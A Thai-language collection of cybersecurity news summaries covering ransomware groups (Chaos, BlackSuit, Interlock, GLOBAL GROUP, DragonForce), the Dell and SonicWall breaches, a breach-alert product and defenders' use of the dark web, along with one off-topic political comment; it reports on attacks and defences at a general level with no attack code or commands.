ยื่นคำร้องขอยึดทรัพย์แบบพลเรือนเพื่อโอนเข้ารัฐบาลสหรัฐฯ ✅ Chaos ransomware เป็นกลุ่มใหม่ที่เกิดขึ้นหลัง BlackSuit ถูกปราบปราม ➡️ มีลักษณะการโจมตีคล้าย BlackSuit เช่น การเข้ารหัสไฟล์และข่มขู่เปิดเผยข้อมูล ➡️ ใช้ชื่อ “.chaos” เป็นนามสกุลไฟล์ที่ถูกเข้ารหัส และ “readme.chaos.txt” เป็นโน้ตเรียกค่าไถ่ ✅ ใช้เทคนิคหลอกลวงผ่านโทรศัพท์และซอฟต์แวร์ช่วยเหลือระยะไกล ➡️ หลอกเหยื่อให้เปิด Microsoft Quick Assist เพื่อให้แฮกเกอร์เข้าถึงระบบ ➡️ ใช้เครื่องมือ RMM เช่น AnyDesk และ ScreenConnect เพื่อคงการเข้าถึง ✅ หากเหยื่อจ่ายเงิน จะได้รับ decryptor และรายงานช่องโหว่ของระบบ ➡️ สัญญาว่าจะลบข้อมูลที่ขโมยไปและไม่โจมตีซ้ำ ➡️ หากไม่จ่าย จะถูกข่มขู่ด้วยการเปิดเผยข้อมูลและโจมตี DDoS ✅ Chaos สามารถโจมตีระบบ Windows, Linux, ESXi และ NAS ได้ ➡️ ใช้การเข้ารหัสแบบ selective encryption เพื่อเพิ่มความเร็ว ➡️ มีระบบป้องกันการวิเคราะห์และหลบเลี่ยง sandbox/debugger ‼️ การใช้เครื่องมือช่วยเหลือระยะไกลอาจเปิดช่องให้แฮกเกอร์เข้าถึงระบบ ⛔ Microsoft Quick Assist ถูกใช้เป็นช่องทางหลักในการหลอกเหยื่อ ⛔ ผู้ใช้ควรตรวจสอบตัวตนผู้ขอความช่วยเหลือก่อนให้สิทธิ์เข้าถึง ‼️ การไม่จ่ายค่าไถ่อาจนำไปสู่การเปิดเผยข้อมูลและโจมตีเพิ่มเติม ⛔ Chaos ข่มขู่จะเปิดเผยข้อมูลต่อสาธารณะและโจมตี DDoS ⛔ ส่งผลต่อชื่อเสียงและความเชื่อมั่นขององค์กร ‼️ การใช้สกุลเงินดิจิทัลไม่สามารถปกปิดตัวตนได้เสมอไป ⛔ FBI สามารถติดตามและยึด Bitcoin ผ่านการวิเคราะห์บล็อกเชน ⛔ การใช้ crypto ไม่ได้หมายถึงความปลอดภัยจากการถูกจับกุม ‼️ กลุ่มแรนซัมแวร์มีแนวโน้มเปลี่ยนชื่อและกลับมาใหม่หลังถูกปราบปราม ⛔ Chaos อาจเป็นการรีแบรนด์จาก BlackSuit ซึ่งเดิมคือ Royal และ Conti ⛔ การปราบปรามต้องต่อเนื่องและครอบคลุมทั้งโครงสร้างพื้นฐานและการเงิน https://www.tomshardware.com/tech-industry/cryptocurrency/fbi-seizes-usd2-4-million-in-bitcoin-from-member-of-recently-ascendant-chaos-ransomware-group

🎙️ เรื่องเล่าจากเบื้องหลังจอ: เมื่อ Albavisión ถูกโจมตีโดย GLOBAL GROUP Albavisión คือเครือข่ายสื่อขนาดใหญ่ที่มีสถานีโทรทัศน์ 45 ช่อง, สถานีวิทยุ 68 แห่ง, โรงภาพยนตร์กว่า 65 แห่ง และสื่อสิ่งพิมพ์ในกว่า 14 ประเทศทั่วละตินอเมริกา ก่อตั้งโดย Remigio Ángel González นักธุรกิจผู้พลิกฟื้นสื่อที่กำลังล้มให้กลับมาทำกำไรด้วยละครท้องถิ่นและภาพยนตร์ฮอลลีวูด แต่ในเดือนกรกฎาคม 2025 GLOBAL GROUP ซึ่งเป็นกลุ่มแรนซัมแวร์แบบ RaaS (Ransomware-as-a-Service) ได้อ้างว่าเจาะระบบของ Albavisión และขโมยข้อมูลกว่า 400 GB โดยใช้เทคนิคการเจรจาแบบใหม่ผ่านแชตบอท AI ที่รองรับหลายภาษา กลุ่มนี้ยังเคยเรียกค่าไถ่สูงถึง 9.5 BTC (ประมาณ 1 ล้านดอลลาร์) จากเหยื่อรายอื่น และมีประวัติการโจมตีองค์กรสื่ออื่น ๆ เช่น RTC ในอิตาลี และ RTE ที่อาจหมายถึงสถานีในไอร์แลนด์ ✅ Albavisión ถูกโจมตีโดยกลุ่ม GLOBAL GROUP และถูกขโมยข้อมูล 400 GB ➡️ เป็นบริษัทสื่อภาษาสเปนขนาดใหญ่ มีฐานอยู่ที่ไมอามี ➡️ ดำเนินกิจการในกว่า 14 ประเทศในละตินอเมริกา ✅ GLOBAL GROUP เป็นกลุ่มแรนซัมแวร์แบบ RaaS ที่เปิดตัวในมิถุนายน 2025 ➡️ ใช้แชตบอท AI เพื่อเจรจากับเหยื่อโดยอัตโนมัติ ➡️ รองรับหลายภาษาเพื่อขยายเป้าหมายทั่วโลก ✅ กลุ่มนี้ขู่จะเปิดเผยข้อมูลหาก Albavisión ไม่เจรจาภายใน 15 วัน ➡️ ใช้เว็บไซต์บนเครือข่าย Tor สำหรับการเจรจาและเผยแพร่ข้อมูล ➡️ มีประวัติการเปิดเผยข้อมูลเหยื่อแล้ว 18 ราย รวมถึงโรงพยาบาล ✅ GLOBAL GROUP มีแนวโน้มมุ่งเป้าไปที่องค์กรสื่อโดยเฉพาะ ➡️ รายชื่อเหยื่อรวมถึง RTC (อิตาลี) และ RTE (อาจเป็นไอร์แลนด์) ➡️ สะท้อนความพยายามในการโจมตีโครงสร้างสื่อสารมวลชน ✅ ผู้ก่อตั้ง Albavisión คือ Remigio Ángel González มูลค่าส่วนตัวราว 2 พันล้านดอลลาร์ ➡️ เป็นนักธุรกิจที่มีชื่อเสียงในการซื้อกิจการสื่อที่ล้มเหลวแล้วพลิกฟื้นให้ทำกำไร ➡️ การโจมตีจึงอาจเป็นการเลือกเป้าหมายอย่างมีนัยสำคัญ https://hackread.com/global-group-ransomware-media-giant-albavision-breach/

🎯 เรื่องเล่าจากโลกไซเบอร์: เมื่อ “หมากรุก” กลายเป็นเกมล่าระหว่างตำรวจกับแฮกเกอร์ ลองจินตนาการว่าโลกไซเบอร์คือกระดานหมากรุก และกลุ่มแฮกเกอร์ชื่อ BlackSuit คือ “ราชา” ที่เดินเกมโจมตีองค์กรทั่วโลกมานานกว่า 2 ปี ด้วยกลยุทธ์ “ดับเบิลเอ็กซ์ทอร์ชัน” (Double Extortion) ที่ไม่เพียงล็อกไฟล์ แต่ยังขโมยข้อมูลแล้วขู่จะเปิดเผยหากไม่จ่ายค่าไถ่ แต่แล้วในเดือนกรกฎาคม 2025 “Operation Checkmate” ก็เกิดขึ้น—ปฏิบัติการระหว่างประเทศที่นำโดย FBI, Europol และหน่วยงานจากกว่า 9 ประเทศ ร่วมกันยึดโดเมน .onion ของ BlackSuit ที่ใช้เจรจาเรียกค่าไถ่และเผยแพร่ข้อมูลเหยื่อบนดาร์กเว็บ นี่คือชัยชนะครั้งใหญ่ของโลกไซเบอร์ แต่ก็เป็นเพียง “การรุกฆาตชั่วคราว” เพราะนักวิจัยพบว่าอดีตสมาชิก BlackSuit ได้เริ่มต้นกลุ่มใหม่ชื่อ “Chaos ransomware” ที่ใช้เทคนิคคล้ายกัน และเริ่มโจมตีองค์กรในสหรัฐฯ และยุโรปแล้ว ✅ หน่วยงานระหว่างประเทศร่วมกันยึดโดเมนของ BlackSuit ransomware ➡️ โดเมน .onion ที่ใช้เจรจาและเผยแพร่ข้อมูลเหยื่อถูกยึดโดย FBI และ Homeland Security ➡️ มีหน่วยงานจากสหรัฐฯ, อังกฤษ, เยอรมนี, ยูเครน, แคนาดา และ Bitdefender ร่วมปฏิบัติการ ✅ BlackSuit เป็นกลุ่มแรนซัมแวร์ที่รีแบรนด์มาจาก Royal และ Conti ➡️ เริ่มต้นจาก Quantum → Zeon → Royal → BlackSuit ➡️ มีประวัติเรียกค่าไถ่รวมกว่า $500 ล้าน และโจมตีองค์กรกว่า 350 แห่ง ✅ กลยุทธ์หลักของ BlackSuit คือ Double Extortion ➡️ ล็อกไฟล์และขโมยข้อมูลเพื่อขู่เปิดเผย ➡️ ใช้ดาร์กเว็บเป็นช่องทางเจรจาและเผยแพร่ข้อมูลเหยื่อ ✅ เหยื่อที่โดดเด่น ได้แก่ Kadokawa, ZooTampa, Octapharma และเมือง Dallas ➡️ มีการขโมยข้อมูลหลายเทราไบต์และทำให้ระบบบริการสาธารณะล่ม https://hackread.com/operation-checkmate-dark-web-blacksuit-ransomware-seized/

🧠 เรื่องเล่าจากโลกไซเบอร์: เมื่อ “การรู้เร็ว” คืออาวุธลับขององค์กร ลองจินตนาการว่าองค์กรของคุณมีระบบความปลอดภัยครบครัน แต่กลับรู้ว่าข้อมูลบัญชีผู้ใช้งานถูกแฮก...จากอีเมลเรียกค่าไถ่ หรือจากฝ่ายซัพพอร์ตที่แจ้งว่ามีคนล็อกอินผิดปกติ! นั่นคือปัญหาที่ xonPlus ต้องการแก้—แพลตฟอร์มใหม่ที่เพิ่งเปิดตัวจากทีมเบื้องหลัง XposedOrNot ซึ่งเป็นเครื่องมือโอเพ่นซอร์สสำหรับตรวจสอบการรั่วไหลของข้อมูลที่มีผู้ใช้หลายล้านคนทั่วโลก xonPlus ทำให้ทีมรักษาความปลอดภัยสามารถรู้ได้ทันทีเมื่ออีเมลหรือโดเมนขององค์กรปรากฏในฐานข้อมูลรั่วไหลหรือฟอรั่มในดาร์กเว็บ พร้อมแจ้งเตือนภายในไม่กี่นาทีหลังจากพบข้อมูลรั่วจริง ระบบนี้ไม่เพียงแค่ตรวจจับ แต่ยังเชื่อมต่อกับเครื่องมือที่องค์กรใช้อยู่แล้ว เช่น SIEM, Slack, Microsoft Teams และอีเมล เพื่อให้การตอบสนองเป็นไปอย่างรวดเร็วและมีประสิทธิภาพ ⭕ จุดเด่นของ xonPlus ที่ปรากฏในข่าว ✅ แจ้งเตือนการรั่วไหลของข้อมูลแบบเรียลไทม์ ➡️ ตรวจพบข้อมูลบัญชีที่รั่วใน breach dumps หรือ dark web ➡️ แจ้งเตือนภายในไม่กี่นาที พร้อมแหล่งที่มาและคำแนะนำ ✅ สร้างบนฐานข้อมูลของ XposedOrNot ➡️ ใช้ข้อมูลจากการติดตาม breach กว่า 10 พันล้านรายการใน 8 ปี ➡️ รองรับการค้นหาหลายล้านครั้งทั่วโลก ✅ โครงสร้างที่ปลอดภัยระดับองค์กร ➡️ ใช้ Cloudflare และ Google Cloud เป็นโครงสร้างพื้นฐาน ➡️ รองรับการใช้งานระดับ enterprise ด้วยความเร็วและความเสถียรสูง ✅ เชื่อมต่อกับระบบที่องค์กรใช้อยู่แล้ว ➡️ รองรับการเชื่อมต่อกับ SIEM, Slack, Microsoft Teams และอีเมล ➡️ มี API สำหรับนักพัฒนา พร้อมระบบ log และ token ✅ รองรับการตรวจสอบหลายโดเมนและอีเมลจำนวนมาก ➡️ ตั้งค่า threshold การแจ้งเตือนได้ตามต้องการ ➡️ ใช้งานได้ทั้งองค์กรใหญ่และทีมเล็กที่ไม่มี SOC ✅ มีโมเดลการใช้งานที่ยืดหยุ่นและราคาคุ้มค่า ➡️ ค่าบริการแบบรายเดือนที่โปร่งใส ➡️ ประหยัดกว่าระบบ threat intel แบบเดิมถึง 5–10 เท่า ‼️ องค์กรที่ไม่มีระบบแจ้งเตือนแบบเรียลไทม์เสี่ยงสูง ⛔ อาจรู้ตัวช้าเมื่อข้อมูลบัญชีถูกแฮก ⛔ การตอบสนองล่าช้าอาจนำไปสู่การเข้าถึงระบบภายในโดยผู้ไม่หวังดี ‼️ การพึ่งพาเครื่องมือแบบเดิมอาจไม่ทันต่อภัยคุกคามยุคใหม่ ⛔ ระบบที่ต้องตั้งค่าซับซ้อนและสัญญาระยะยาวอาจไม่เหมาะกับทีมเล็ก ⛔ การไม่มี API หรือการเชื่อมต่อกับระบบที่ใช้อยู่แล้วทำให้การตอบสนองช้า ‼️ การไม่ตรวจสอบข้อมูลใน dark web เป็นช่องโหว่สำคัญ ⛔ ข้อมูลที่รั่วอาจถูกใช้โจมตีแบบ account takeover หรือ ransomware ⛔ การไม่รู้ว่าข้อมูลขององค์กรอยู่ในมือใครคือความเสี่ยงที่ควบคุมไม่ได้ https://hackread.com/xonplus-launches-real-time-breach-alerting-platform-for-enterprise-credential-exposure/

🎙️ เรื่องเล่าจากมัลแวร์ที่ปลอมตัวเป็น Chrome: เมื่อ Interlock แรนซัมแวร์ใช้ CAPTCHA หลอกให้รันคำสั่งเอง Interlock ถูกตรวจพบครั้งแรกในเดือนกันยายน 2024 และมีการโจมตีเพิ่มขึ้นในช่วงกลางปี 2025 โดย FBI พบว่า: - กลุ่มนี้พัฒนาแรนซัมแวร์สำหรับทั้ง Windows และ Linux - เน้นโจมตีระบบ virtual machine (VM) และใช้เทคนิคใหม่ในการเข้าถึงระบบ เทคนิคที่ใช้มีความแปลกใหม่ เช่น: - “Drive-by download” จากเว็บไซต์ที่ถูกแฮก โดยปลอมเป็นอัปเดตของ Chrome, Edge, FortiClient หรือ Cisco Secure Client - “ClickFix” — หลอกให้ผู้ใช้คลิก CAPTCHA ปลอม แล้วคัดลอกคำสั่งไปวางในหน้าต่าง Run ของระบบ เมื่อเข้าระบบได้แล้ว Interlock จะ: - ใช้ web shell และ Cobalt Strike เพื่อควบคุมระบบ - ขโมยข้อมูล เช่น username, password และใช้ keylogger บันทึกการพิมพ์ - เข้ารหัสไฟล์และเปลี่ยนนามสกุลเป็น .interlock หรือ .1nt3rlock - ส่งโน้ตร้องขอค่าไถ่ผ่านเว็บไซต์ .onion โดยไม่ระบุจำนวนเงิน - ข่มขู่ว่าจะเปิดเผยข้อมูลหากไม่จ่ายค่าไถ่เป็น Bitcoin — และเคยทำจริงหลายครั้ง FBI, CISA, HHS และ MS-ISAC แนะนำให้ทุกองค์กรเร่งดำเนินมาตรการป้องกัน เช่น: - ใช้ DNS filtering และ firewall เพื่อป้องกันการเข้าถึงเว็บอันตราย - อัปเดตระบบและซอฟต์แวร์ทั้งหมด - ใช้ MFA และจัดการสิทธิ์การเข้าถึงอย่างเข้มงวด - แบ่งเครือข่ายเพื่อลดการแพร่กระจาย - สำรองข้อมูลแบบ offline และไม่สามารถแก้ไขได้ (immutable backup) ✅ FBI และ CISA เตือนภัย Interlock ransomware ที่โจมตีองค์กรและโครงสร้างพื้นฐานสำคัญ ➡️ ใช้เทคนิค double extortion คือทั้งเข้ารหัสและข่มขู่เปิดเผยข้อมูล ✅ Interlock พัฒนาแรนซัมแวร์สำหรับ Windows และ Linux โดยเน้นโจมตี VM ➡️ ใช้เทคนิคใหม่ เช่น drive-by download และ ClickFix ✅ ClickFix คือการหลอกให้ผู้ใช้คลิก CAPTCHA ปลอม แล้วรันคำสั่งอันตรายเอง ➡️ เป็นการใช้ social engineering ที่แยบยลและยากต่อการตรวจจับ ✅ หลังเข้าระบบ Interlock ใช้ Cobalt Strike และ web shell เพื่อควบคุมและขโมยข้อมูล ➡️ รวมถึงการใช้ keylogger เพื่อดักจับการพิมพ์ ✅ ไฟล์ที่ถูกเข้ารหัสจะมีนามสกุล .interlock หรือ .1nt3rlock ➡️ โน้ตร้องขอค่าไถ่ไม่ระบุจำนวนเงิน แต่ให้ติดต่อผ่าน Tor ✅ หน่วยงานแนะนำให้ใช้ DNS filtering, MFA, network segmentation และ backup แบบ immutable ➡️ พร้อมทรัพยากรฟรีจากโครงการ #StopRansomware https://hackread.com/fbi-cisa-interlock-ransomware-target-critical-infrastructure/

🎙️ เรื่องเล่าจากรหัสผ่านเดียวที่ล้มบริษัท 158 ปี KNP เป็นบริษัทขนส่งที่มีรถบรรทุกกว่า 500 คัน และพนักงานราว 700 คน โดยมีมาตรการด้านความปลอดภัยตามมาตรฐานอุตสาหกรรม รวมถึงประกันภัยไซเบอร์ แต่กลับถูกโจมตีด้วย ransomware ที่เริ่มต้นจากการ “เดารหัสผ่าน” ของพนักงานคนหนึ่ง แฮกเกอร์เข้าระบบได้และเข้ารหัสข้อมูลทั้งหมดของบริษัท — แม้จะมีประกัน แต่บริษัทประเมินว่าค่าไถ่อาจสูงถึง £5 ล้าน ซึ่งเกินกว่าที่จะจ่ายไหว สุดท้าย KNP ต้องปิดกิจการ และพนักงานทั้งหมดตกงาน Paul Abbott ผู้อำนวยการบริษัทบอกว่าเขาไม่เคยแจ้งพนักงานคนนั้นว่า “รหัสผ่านของเขาคือจุดเริ่มต้นของการล่มสลาย” เพราะไม่อยากให้ใครต้องแบกรับความรู้สึกผิดเพียงคนเดียว หน่วยงานด้านความมั่นคงไซเบอร์ของอังกฤษระบุว่า: - ปีที่ผ่านมา มีการโจมตี ransomware กว่า 19,000 ครั้ง - ค่าไถ่เฉลี่ยอยู่ที่ £4 ล้าน - หนึ่งในสามของบริษัทเลือก “จ่ายเงิน” เพื่อให้ธุรกิจดำเนินต่อได้ Suzanne Grimmer จาก National Crime Agency เตือนว่า: 🔖 “ถ้าแนวโน้มนี้ยังดำเนินต่อไป ปีนี้จะเป็นปีที่เลวร้ายที่สุดสำหรับ ransomware ในสหราชอาณาจักร” ✅ KNP Logistics Group ถูกโจมตีด้วย ransomware จากรหัสผ่านที่เดาง่ายของพนักงาน ➡️ ส่งผลให้ข้อมูลทั้งหมดถูกเข้ารหัส และบริษัทไม่สามารถจ่ายค่าไถ่ได้ ✅ บริษัทมีพนักงานราว 700 คน และรถบรรทุกกว่า 500 คัน ➡️ เป็นหนึ่งในบริษัทขนส่งเก่าแก่ที่สุดในอังกฤษ ✅ ค่าไถ่ถูกประเมินว่าอาจสูงถึง £5 ล้าน แม้จะมีประกันภัยไซเบอร์ ➡️ เกินกว่าที่บริษัทจะรับไหว ทำให้ต้องปิดกิจการ ✅ หน่วยงานความมั่นคงไซเบอร์ของอังกฤษระบุว่ามี ransomware กว่า 19,000 ครั้งในปีที่ผ่านมา ➡️ ค่าไถ่เฉลี่ยอยู่ที่ £4 ล้าน และหนึ่งในสามของบริษัทเลือกจ่ายเงิน ✅ Paul Abbott ไม่แจ้งพนักงานเจ้าของรหัสผ่านว่าเป็นต้นเหตุของการล่มสลาย ➡️ เพื่อไม่ให้เกิดความรู้สึกผิดที่รุนแรงเกินไป ✅ ผู้เชี่ยวชาญระบุว่าแฮกเกอร์มัก “รอวันที่องค์กรอ่อนแอ” แล้วลงมือทันที ➡️ ไม่จำเป็นต้องเจาะระบบซับซ้อน แค่รหัสผ่านอ่อนก็พอ https://www.techspot.com/news/108749-one-weak-password-brought-down-158-year-old.html

🎙️ เรื่องเล่าจากเบื้องหลังไฟล์: เมื่อ Dell ถูกเจาะแบบไม่ต้องล็อกไฟล์ World Leaks ซึ่งเป็นกลุ่มแฮกเกอร์ที่เคยใช้ชื่อว่า Hunters International ได้เปลี่ยนกลยุทธ์จาก ransomware มาเป็นการขโมยข้อมูลโดยตรง — แล้วขู่เปิดเผยต่อสาธารณะเพื่อเรียกค่าไถ่ โดยไม่ต้องใช้การเข้ารหัสไฟล์อีกต่อไป ในกรณีของ Dell: - กลุ่มนี้อ้างว่าได้ข้อมูลภายในจากระบบทั่วโลกของ Dell ทั้งในอเมริกา, ยุโรป และเอเชียแปซิฟิก - มีไฟล์กว่า 416,103 รายการ รวมถึงสคริปต์ Terraform, เครื่องมือ VMware, โค้ดทดสอบ, และข้อมูลระบบเฝ้าระวัง - มีการกล่าวถึงผลิตภัณฑ์ของ Dell เช่น PowerPath, PowerStore และ firmware สำหรับฮาร์ดแวร์ของ Dell - Dell ยืนยันว่ามีการเข้าถึงระบบ “Solution Center” ซึ่งใช้สำหรับการสาธิตและทดสอบเท่านั้น — ไม่เกี่ยวกับระบบบริการลูกค้าหรือพันธมิตร แม้ Dell จะไม่ใช้คำว่า “ถูกเจาะระบบ” โดยตรง แต่ก็ยอมรับว่ามีการเข้าถึงโดยไม่ได้รับอนุญาต และกำลังสอบสวนเพิ่มเติม ✅ กลุ่ม World Leaks อ้างว่าเจาะระบบของ Dell และนำข้อมูลภายในกว่า 1.3 TB ออกมาเผยแพร่ ➡️ มีไฟล์กว่า 416,103 รายการที่เกี่ยวข้องกับเครื่องมือภายในและข้อมูลระบบ ✅ ข้อมูลครอบคลุมจากหลายภูมิภาคทั่วโลก เช่นอเมริกา, ยุโรป, เอเชียแปซิฟิก ➡️ มีสคริปต์ระบบ, โค้ดทดสอบ, และข้อมูลการพัฒนาและสนับสนุน ✅ Dell ยืนยันว่ามีการเข้าถึงระบบ “Solution Center” ที่ใช้สำหรับการสาธิตและทดสอบ ➡️ ระบบนี้แยกจากเครือข่ายลูกค้าและพันธมิตร และมีข้อมูลสังเคราะห์เป็นหลัก ✅ World Leaks เปลี่ยนกลยุทธ์จาก ransomware มาเป็นการขโมยข้อมูลและขู่เปิดเผย ➡️ ลดความเสี่ยงจากการถูกติดตามโดยหน่วยงานรัฐ และเพิ่มแรงกดดันต่อเหยื่อ ✅ ใช้เครื่องมือ exfiltration แบบใหม่ที่สามารถดึงข้อมูลจำนวนมากโดยอัตโนมัติ ➡️ เป็นเวอร์ชันที่พัฒนาจากเครื่องมือเดิมของ Hunters International ✅ Dell เคยถูกเจาะระบบมาก่อน เช่นในปี 2024 ที่มีข้อมูลลูกค้าและพนักงานรั่วไหล ➡️ รวมถึงข้อมูลจาก 49 ล้านบัญชี และพนักงานกว่า 10,000 คน https://hackread.com/world-leaks-dell-data-breach-leaks-1-3-tb-of-files/

🎙️ เรื่องเล่าจากโลกไซเบอร์: ช่องโหว่เก่าใน SonicWall กลับมาหลอกหลอนองค์กรอีกครั้ง Google Threat Intelligence Group (GTIG) รายงานว่ากลุ่มแฮกเกอร์ UNC6148 ซึ่งมีแรงจูงใจทางการเงิน ได้ใช้ช่องโหว่ zero-day ในอุปกรณ์ SonicWall SMA 100 series เพื่อฝังมัลแวร์ OVERSTEP ซึ่งเป็น rootkit แบบ user-mode ที่สามารถ: - แก้ไขกระบวนการบูตของอุปกรณ์ - ขโมยข้อมูล credential และ OTP seed - ซ่อนตัวเองจากระบบตรวจจับ แม้อุปกรณ์จะได้รับการแพตช์แล้ว แต่แฮกเกอร์ยังสามารถเข้าถึงได้ผ่าน credential ที่ขโมยไว้ก่อนหน้านี้ ทำให้การอัปเดตไม่สามารถป้องกันการโจมตีได้อย่างสมบูรณ์ หนึ่งในองค์กรที่ถูกโจมตีในเดือนพฤษภาคม 2025 ถูกนำข้อมูลไปเผยแพร่บนเว็บไซต์ World Leaks ในเดือนมิถุนายน และมีความเชื่อมโยงกับการโจมตีที่ใช้ ransomware ชื่อ Abyss ซึ่งเคยเกิดขึ้นในช่วงปลายปี 2023 ถึงต้นปี 2024 ✅ กลุ่มแฮกเกอร์ UNC6148 ใช้ช่องโหว่ใน SonicWall SMA 100 series ➡️ แม้อุปกรณ์จะได้รับการแพตช์แล้ว แต่ยังถูกเจาะผ่าน credential เดิม ✅ มัลแวร์ OVERSTEP เป็น rootkit แบบ user-mode ➡️ แก้ไขกระบวนการบูต ขโมยข้อมูล และซ่อนตัวเองจากระบบ ✅ การโจมตีเริ่มต้นตั้งแต่ตุลาคม 2024 และยังดำเนินต่อเนื่อง ➡️ มีเป้าหมายเพื่อขโมยข้อมูลและเรียกค่าไถ่ ✅ องค์กรที่ถูกโจมตีถูกนำข้อมูลไปเผยแพร่บนเว็บไซต์ World Leaks ➡️ แสดงถึงความรุนแรงของการละเมิดข้อมูล ✅ GTIG เชื่อมโยงการโจมตีกับ ransomware ชื่อ Abyss (VSOCIETY) ➡️ เคยใช้โจมตี SonicWall ในช่วงปลายปี 2023 ✅ การโจมตีเน้นอุปกรณ์ที่หมดอายุการสนับสนุน (end-of-life) ➡️ เช่น SonicWall SMA 100 series ที่ยังมีการใช้งานอยู่ในบางองค์กร https://www.techradar.com/pro/security/hacker-using-backdoor-to-exploit-sonicwall-secure-mobile-access-to-steal-credentials

ดาร์กเว็บไม่ใช่แค่ของแฮกเกอร์ – นักป้องกันไซเบอร์ก็ใช้มันเพื่อปกป้องคุณ แม้ภาพจำของดาร์กเว็บจะเป็นแหล่งรวมอาชญากรไซเบอร์ แต่ในความเป็นจริง นักวิจัยด้านความปลอดภัย, นักข่าว, และแม้แต่หน่วยงานรัฐก็ใช้มันเพื่อวัตถุประสงค์เชิงบวก เช่น: - ตรวจสอบภัยคุกคามล่วงหน้า เช่น มัลแวร์ใหม่, ช่องโหว่, และเครื่องมือฟิชชิ่ง - ติดตามข้อมูลรั่วไหลจากการโจมตี ransomware - สืบหาตัวผู้ก่อเหตุและกลุ่มแฮกเกอร์ - ใช้เป็นช่องทางสื่อสารกับผู้โจมตีในกรณีเจรจาเรียกค่าไถ่ - ตรวจสอบความเสียหายจากการรั่วไหลของข้อมูล เช่น ข้อมูลลูกค้า, พาสปอร์ต, หรือข้อมูลสุขภาพ - ใช้ในการวิจัยและรายงานข่าวอย่างเป็นอิสระ โดยไม่เปิดเผยตัวตน นอกจากนี้ ดาร์กเว็บยังเป็นช่องทางสำคัญสำหรับผู้แจ้งเบาะแสในประเทศที่มีการเซ็นเซอร์หรือควบคุมอินเทอร์เน็ต เช่น การเข้าถึงเว็บไซต์ข่าวที่ถูกแบน หรือการเปิดโปงการทุจริตของรัฐ หน่วยงานอย่าง FBI, Interpol และตำรวจสากลก็ใช้ดาร์กเว็บในการสืบสวนและจับกุมกลุ่มอาชญากร เช่น การปิดเว็บขายยาเสพติด หรือการล้มล้างบริการมัลแวร์แบบ MaaS (Malware-as-a-Service) ✅ ข้อมูลจากข่าว - ดาร์กเว็บถูกใช้โดยนักวิจัย, นักข่าว, และหน่วยงานรัฐเพื่อวัตถุประสงค์ด้านความปลอดภัย - ใช้ตรวจสอบภัยคุกคามล่วงหน้า เช่น มัลแวร์ใหม่, ช่องโหว่, และเครื่องมือฟิชชิ่ง - ใช้ติดตามข้อมูลรั่วไหลจากการโจมตี ransomware และการขายข้อมูลในฟอรัมลับ - ใช้สืบหาตัวผู้ก่อเหตุและกลุ่มแฮกเกอร์ รวมถึงเจรจาเรียกค่าไถ่ - ใช้ในการวิจัยและรายงานข่าวอย่างเป็นอิสระ โดยไม่เปิดเผยตัวตน - หน่วยงานรัฐใช้ดาร์กเว็บในการสืบสวนและจับกุมกลุ่มอาชญากรไซเบอร์ - ผู้แจ้งเบาะแสและนักเคลื่อนไหวใช้ดาร์กเว็บเพื่อหลีกเลี่ยงการเซ็นเซอร์ - บริการตรวจสอบข้อมูลรั่วไหล เช่น HaveIBeenPwned และ Intelligence X ใช้ดาร์กเว็บในการแจ้งเตือนผู้ใช้ ‼️ คำเตือนและข้อควรระวัง - การเข้าถึงดาร์กเว็บต้องใช้เครื่องมือเฉพาะ เช่น Tor และควรมีความรู้ด้านความปลอดภัย - หากใช้งานโดยไม่ระวัง อาจตกเป็นเป้าหมายของมัลแวร์หรือการหลอกลวง - ข้อมูลที่พบในดาร์กเว็บอาจไม่ถูกต้องหรือเป็นข้อมูลปลอม ต้องตรวจสอบอย่างรอบคอบ - การสื่อสารกับผู้โจมตีผ่านดาร์กเว็บอาจมีความเสี่ยงด้านกฎหมายและจริยธรรม - ผู้ใช้ทั่วไปไม่ควรเข้าไปในดาร์กเว็บโดยไม่มีเหตุผลหรือการป้องกันที่เพียงพอ https://www.csoonline.com/article/4017766/how-defenders-use-the-dark-web.html

..555ตามคาด,เก็บส่วยจากทุกๆประเทศสำเร็จแล้วกว่า10ล้านล้านจะบาทหรือเหรียญก็ตามนะ,หนี้กว่า35-36ล้านล้านของอเมริกานั้นคงหมดเร็วๆนี้แน่นอน.,บังคับเรียกค่าไถ่จากทุกๆประเทศทั่วโลกก็ได้ สาระพัดมุกวิธีการล่ะ, ..เดือดร้อนจริงๆคือกิจการนายทุนล่ะ, ..ประชาชนคนไทยธรรมดาไม่ได้รับผลกระทบอะไรมากมายหรอก,สื่อไทยตีข่าวปั่นกระแสเลียนายทุนต่างๆเท่านั้น โวยวายให้อเมริกาทรัมป์ดูพอมีแอ็คชั่นเท่านั้นล่ะ, ..ปรับฐานตั้งรับภายในจริงจังก็จบ,แต่ต้องเป็นนายกฯพิเศษนะจะสั่งการลงคำสั่งจัดการบริหารงานทางที่ดีให้เด็ดขาดรับรู้ผลดีทันกาลได้. ..https://youtu.be/1WosDhMiRDo?si=-vig3Ljc-KAvRuQC

ในโลกใต้ดินของแรนซัมแวร์ เหล่าแก๊งแฮกเกอร์ไม่ได้แค่รอเรียกค่าไถ่จากเหยื่อ แต่ยังต้องแข่งกันเอง — ล่าสุด “DragonForce” (กลุ่มอาชญากรไซเบอร์รัสเซีย) ไม่พอใจที่ “RansomHub” แย่งพันธมิตรในเครือข่ายแรนซัมแวร์ → จึงเปิดศึกแย่งพื้นที่ (turf war) โดยเริ่มจากการโจมตี “เว็บบนดาร์กเว็บของ RansomHub” ให้ล่มไปเลย สิ่งที่นักวิเคราะห์กลัวคือ: → แก๊งทั้งสองอาจโจมตีเหยื่อองค์กรเดียวกัน “พร้อมกัน” เพื่อแย่งผลงานกันเอง → หรือบางกรณีเกิด “แรนซัมซ้อนแรนซัม” — เรียกค่าไถ่จากเหยื่อซ้ำหลายรอบ → เหมือนกรณี UnitedHealth Group ที่เคยจ่ายค่าไถ่ให้แก๊งหนึ่งไปแล้ว แต่ถูกอีกแก๊งใช้ช่องทางอื่นมารีดซ้ำอีกจนต้องจ่ายอีกรอบ นักวิเคราะห์จาก Google Threat Intelligence Group เตือนว่า → วิกฤตนี้อาจทำให้สภาพแวดล้อมภัยไซเบอร์สำหรับเหยื่อแย่ลงมาก → เพราะ “ความไร้เสถียรภาพของแก๊งแฮกเกอร์เอง” ก็เพิ่มโอกาสถูกโจมตีซ้ำหรือโดนรีดไถต่อเนื่อง → แต่บางฝั่งก็มองว่า การแตกคอกันในวงการแรนซัมแวร์อาจทำให้แก๊งเหล่านี้อ่อนแอลงจากภายในในระยะยาวก็ได้ ✅ แก๊ง DragonForce กำลังทำสงครามไซเบอร์กับ RansomHub 